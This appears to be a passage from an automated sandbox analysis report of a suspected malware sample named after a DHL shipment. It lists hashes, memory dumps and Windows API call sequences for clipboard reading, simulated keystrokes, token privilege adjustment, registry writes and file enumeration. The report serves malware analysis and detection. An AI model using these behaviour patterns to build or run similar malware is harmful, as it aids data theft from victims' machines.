                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongNamePath_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2514874351-0
                                                                                  • Opcode ID: 663271987e24e81dbfb9cab845d066cdd291f6d39291b5f98a5e5473fb6c4025
                                                                                  • Instruction ID: 0318b5649dc554f4329fa6a7d7c441ee7959512091eca3f78adbbc412a3b35da
                                                                                  • Opcode Fuzzy Hash: 663271987e24e81dbfb9cab845d066cdd291f6d39291b5f98a5e5473fb6c4025
                                                                                  • Instruction Fuzzy Hash: 49E086769442285BC720E6589C05FFA77EDDF887A1F0401B6FC0CD7248E9649C818691
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wfsopen
                                                                                  • String ID:
                                                                                  • API String ID: 197181222-0
                                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                  • Instruction ID: ce350de4b08df158806ebca8a92aaed3a96e93d6cfab4538b195c443e53b488a
                                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                  • Instruction Fuzzy Hash: B9B092B684020C77DE012E96EC02A693F19AB50678F808020FB0C18162A673A6A0968E
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 00E4F289
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction ID: 01dad5f2848b12612f4e359b8e652c25aadce7879eb41d40a7ac86dd22ce1eac
                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction Fuzzy Hash: D4E0E67494010DDFDB00DFB4D54969E7BB4EF04701F100161FD01E2690D6709D508A62
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0095CE50
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095CE91
                                                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0095CED6
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095CF00
                                                                                  • SendMessageW.USER32 ref: 0095CF29
                                                                                  • _wcsncpy.LIBCMT ref: 0095CFA1
                                                                                  • GetKeyState.USER32(00000011), ref: 0095CFC2
                                                                                  • GetKeyState.USER32(00000009), ref: 0095CFCF
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095CFE5
                                                                                  • GetKeyState.USER32(00000010), ref: 0095CFEF
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095D018
                                                                                  • SendMessageW.USER32 ref: 0095D03F
                                                                                  • SendMessageW.USER32(?,00001030,?,0095B602), ref: 0095D145
                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0095D15B
                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0095D16E
                                                                                  • SetCapture.USER32(?), ref: 0095D177
                                                                                  • ClientToScreen.USER32(?,?), ref: 0095D1DC
                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0095D1E9
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0095D203
                                                                                  • ReleaseCapture.USER32 ref: 0095D20E
                                                                                  • GetCursorPos.USER32(?), ref: 0095D248
                                                                                  • ScreenToClient.USER32(?,?), ref: 0095D255
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0095D2B1
                                                                                  • SendMessageW.USER32 ref: 0095D2DF
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0095D31C
                                                                                  • SendMessageW.USER32 ref: 0095D34B
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0095D36C
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0095D37B
                                                                                  • GetCursorPos.USER32(?), ref: 0095D39B
                                                                                  • ScreenToClient.USER32(?,?), ref: 0095D3A8
                                                                                  • GetParent.USER32(?), ref: 0095D3C8
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0095D431
                                                                                  • SendMessageW.USER32 ref: 0095D462
                                                                                  • ClientToScreen.USER32(?,?), ref: 0095D4C0
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0095D4F0
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0095D51A
                                                                                  • SendMessageW.USER32 ref: 0095D53D
                                                                                  • ClientToScreen.USER32(?,?), ref: 0095D58F
                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0095D5C3
                                                                                    • Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0095D65F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                  • String ID: @GUI_DRAGID$F
                                                                                  • API String ID: 3977979337-4164748364
                                                                                  • Opcode ID: a48ce6f0f95909818f00fc28d6acacfadb0355902a057f95dee3e6792296849b
                                                                                  • Instruction ID: 14ad9e8bb95413fdb2e7fe6fdb4d6547eb3d5d5a53180e7b8681b2b64318d71f
                                                                                  • Opcode Fuzzy Hash: a48ce6f0f95909818f00fc28d6acacfadb0355902a057f95dee3e6792296849b
                                                                                  • Instruction Fuzzy Hash: 7C42AF70109341AFDB25CF2AC894F6ABBF9FF48315F140519FA59872A0D7319C49DB92
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0095873F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: %d/%02d/%02d
                                                                                  • API String ID: 3850602802-328681919
                                                                                  • Opcode ID: 8fe0cba292e64ade3054169dc53d76399e4596ef65b89b225e3d0691fbeec789
                                                                                  • Instruction ID: 9eceaec5d12b85b48e4c8db9967502e9deac5b9073dbe3377b730c366b02f583
                                                                                  • Opcode Fuzzy Hash: 8fe0cba292e64ade3054169dc53d76399e4596ef65b89b225e3d0691fbeec789
                                                                                  • Instruction Fuzzy Hash: 8412CF71505208ABEB258F2ACC49FAF7BF8EF49312F204569F915EA2E1DF748945CB10
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$_memset
                                                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                  • API String ID: 1357608183-1798697756
                                                                                  • Opcode ID: f6554a290bb8575d8b195b770100ee5a0cd1f01c0f7725cecfe0dad9e1f94ba3
                                                                                  • Instruction ID: d5a8845000bca7a29d9af94cdfd51b919674355986c0dd01440d0a3f7340e1c5
                                                                                  • Opcode Fuzzy Hash: f6554a290bb8575d8b195b770100ee5a0cd1f01c0f7725cecfe0dad9e1f94ba3
                                                                                  • Instruction Fuzzy Hash: 6F93C271A0422ADFDB24CF58D881BADB7B5FF48314F24856AE945EB384E7749E81CB40
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(00000000,?), ref: 008D4A3D
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0090DA8E
                                                                                  • IsIconic.USER32(?), ref: 0090DA97
                                                                                  • ShowWindow.USER32(?,00000009), ref: 0090DAA4
                                                                                  • SetForegroundWindow.USER32(?), ref: 0090DAAE
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0090DAC4
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0090DACB
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0090DAD7
                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0090DAE8
                                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0090DAF0
                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 0090DAF8
                                                                                  • SetForegroundWindow.USER32(?), ref: 0090DAFB
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB10
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0090DB1B
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB25
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0090DB2A
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB33
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0090DB38
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0090DB42
                                                                                  • keybd_event.USER32(00000012,00000000), ref: 0090DB47
                                                                                  • SetForegroundWindow.USER32(?), ref: 0090DB4A
                                                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 0090DB71
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 4125248594-2988720461
                                                                                  • Opcode ID: 20563ab8fd90f577c7f8c4934b3983dd1b117adb0be92c19828e5821e180e4c2
                                                                                  • Instruction ID: 058aacbc49254b55261a0fce2e3f0087a32eeba7b1af0a5239b03d38fb2151a9
                                                                                  • Opcode Fuzzy Hash: 20563ab8fd90f577c7f8c4934b3983dd1b117adb0be92c19828e5821e180e4c2
                                                                                  • Instruction Fuzzy Hash: 20317071A95318BFEB206FA29C49F7F3E6CEB44B61F114025FA04EB1D0D6B05901BBA0
                                                                                  APIs
                                                                                    • Part of subcall function 00928CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
                                                                                    • Part of subcall function 00928CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
                                                                                    • Part of subcall function 00928CC3: GetLastError.KERNEL32 ref: 00928D47
                                                                                  • _memset.LIBCMT ref: 0092889B
                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009288ED
                                                                                  • CloseHandle.KERNEL32(?), ref: 009288FE
                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00928915
                                                                                  • GetProcessWindowStation.USER32 ref: 0092892E
                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00928938
                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00928952
                                                                                    • Part of subcall function 00928713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00928851), ref: 00928728
                                                                                    • Part of subcall function 00928713: CloseHandle.KERNEL32(?,?,00928851), ref: 0092873A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                  • String ID: $default$winsta0
                                                                                  • API String ID: 2063423040-1027155976
                                                                                  • Opcode ID: 194cadc185b220dcc63ee00724d889fc6d900e42fd9c54dd5a01a8215cbdb66f
                                                                                  • Instruction ID: 30198a170f9f04b1e56faf590e2e80e4fd6626464fd7947de5b2560af74187cf
                                                                                  • Opcode Fuzzy Hash: 194cadc185b220dcc63ee00724d889fc6d900e42fd9c54dd5a01a8215cbdb66f
                                                                                  • Instruction Fuzzy Hash: 3B814871902219AFDF11DFA4EC45AAFBBBCEF04315F08416AF910A6265DF318A159B60
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(0095F910), ref: 00944284
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00944292
                                                                                  • GetClipboardData.USER32(0000000D), ref: 0094429A
                                                                                  • CloseClipboard.USER32 ref: 009442A6
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 009442C2
                                                                                  • CloseClipboard.USER32 ref: 009442CC
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 009442E1
                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 009442EE
                                                                                  • GetClipboardData.USER32(00000001), ref: 009442F6
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00944303
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00944337
                                                                                  • CloseClipboard.USER32 ref: 00944447
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                  • String ID:
                                                                                  • API String ID: 3222323430-0
                                                                                  • Opcode ID: 0b900476f15071fb6b962bbd9423a58f8d8433ace4ef98eb98b77c92d5cb4ac1
                                                                                  • Instruction ID: 829164c59e7cfe094d2954b983b4e0a0d346dde53b4c0441dd33680d737f2e96
                                                                                  • Opcode Fuzzy Hash: 0b900476f15071fb6b962bbd9423a58f8d8433ace4ef98eb98b77c92d5cb4ac1
                                                                                  • Instruction Fuzzy Hash: 6751A171208306ABD310EF65ECA5F7F77A8BF84B11F00462AF556D22A1DF70D9049B62
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0093C9F8
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093CA4C
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093CA71
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093CA88
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CAAF
                                                                                  • __swprintf.LIBCMT ref: 0093CAFB
                                                                                  • __swprintf.LIBCMT ref: 0093CB3E
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                  • __swprintf.LIBCMT ref: 0093CB92
                                                                                    • Part of subcall function 008F38D8: __woutput_l.LIBCMT ref: 008F3931
                                                                                  • __swprintf.LIBCMT ref: 0093CBE0
                                                                                    • Part of subcall function 008F38D8: __flsbuf.LIBCMT ref: 008F3953
                                                                                    • Part of subcall function 008F38D8: __flsbuf.LIBCMT ref: 008F396B
                                                                                  • __swprintf.LIBCMT ref: 0093CC2F
                                                                                  • __swprintf.LIBCMT ref: 0093CC7E
                                                                                  • __swprintf.LIBCMT ref: 0093CCCD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                  • API String ID: 3953360268-2428617273
                                                                                  • Opcode ID: c9903bcd93424a867fc5090ede8d5755021237eaddaf09ed2d6bcc1c1527408b
                                                                                  • Instruction ID: c27a90bfcd4eb9ed5b1aad85bb3a3ab8013bec405cd186e925982f48921c3122
                                                                                  • Opcode Fuzzy Hash: c9903bcd93424a867fc5090ede8d5755021237eaddaf09ed2d6bcc1c1527408b
                                                                                  • Instruction Fuzzy Hash: FBA142B2418315ABC710EB68C895DAFB7ECFF94704F404A2AF595D3291EA34DA04CB63
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0093F221
                                                                                  • _wcscmp.LIBCMT ref: 0093F236
                                                                                  • _wcscmp.LIBCMT ref: 0093F24D
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0093F25F
                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0093F279
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0093F291
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093F29C
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0093F2B8
                                                                                  • _wcscmp.LIBCMT ref: 0093F2DF
                                                                                  • _wcscmp.LIBCMT ref: 0093F2F6
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0093F308
                                                                                  • SetCurrentDirectoryW.KERNEL32(0098A5A0), ref: 0093F326
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0093F330
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093F33D
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093F34F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1803514871-438819550
                                                                                  • Opcode ID: 191efdcdd44f7733e4b614890f414a32674627a5e12d8e965e3dc036aef34923
                                                                                  • Instruction ID: 8461ac7b01615347816d8a0bad5181ef4e943ad64c89d5c39bcf4630e598e0c9
                                                                                  • Opcode Fuzzy Hash: 191efdcdd44f7733e4b614890f414a32674627a5e12d8e965e3dc036aef34923
                                                                                  • Instruction Fuzzy Hash: E531B276900219AADF10EBB5DC68AEF73ACAF483A1F100176F914D31A0EB34DA45DF50
                                                                                  APIs
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950BDE
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0095F910,00000000,?,00000000,?,?), ref: 00950C4C
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00950C94
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00950D1D
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0095103D
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0095104A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                  • API String ID: 536824911-966354055
                                                                                  • Opcode ID: 65fb57842d280c823b7ce7aa7c6880859974549b764c8c1bd7d0127ca30a633a
                                                                                  • Instruction ID: c43a452364a1ae5850e93eb7970d03fc380388dbb9e86c63359b3199ee5d9862
                                                                                  • Opcode Fuzzy Hash: 65fb57842d280c823b7ce7aa7c6880859974549b764c8c1bd7d0127ca30a633a
                                                                                  • Instruction Fuzzy Hash: 50025F75204611AFCB14EF29C895E2AB7E5FF89714F04895DF9899B3A2CB30EC44CB42
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0093F37E
                                                                                  • _wcscmp.LIBCMT ref: 0093F393
                                                                                  • _wcscmp.LIBCMT ref: 0093F3AA
                                                                                    • Part of subcall function 009345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009345DC
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0093F3D9
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093F3E4
                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0093F400
                                                                                  • _wcscmp.LIBCMT ref: 0093F427
                                                                                  • _wcscmp.LIBCMT ref: 0093F43E
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0093F450
                                                                                  • SetCurrentDirectoryW.KERNEL32(0098A5A0), ref: 0093F46E
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0093F478
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093F485
                                                                                  • FindClose.KERNEL32(00000000), ref: 0093F497
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                  • String ID: *.*
                                                                                  • API String ID: 1824444939-438819550
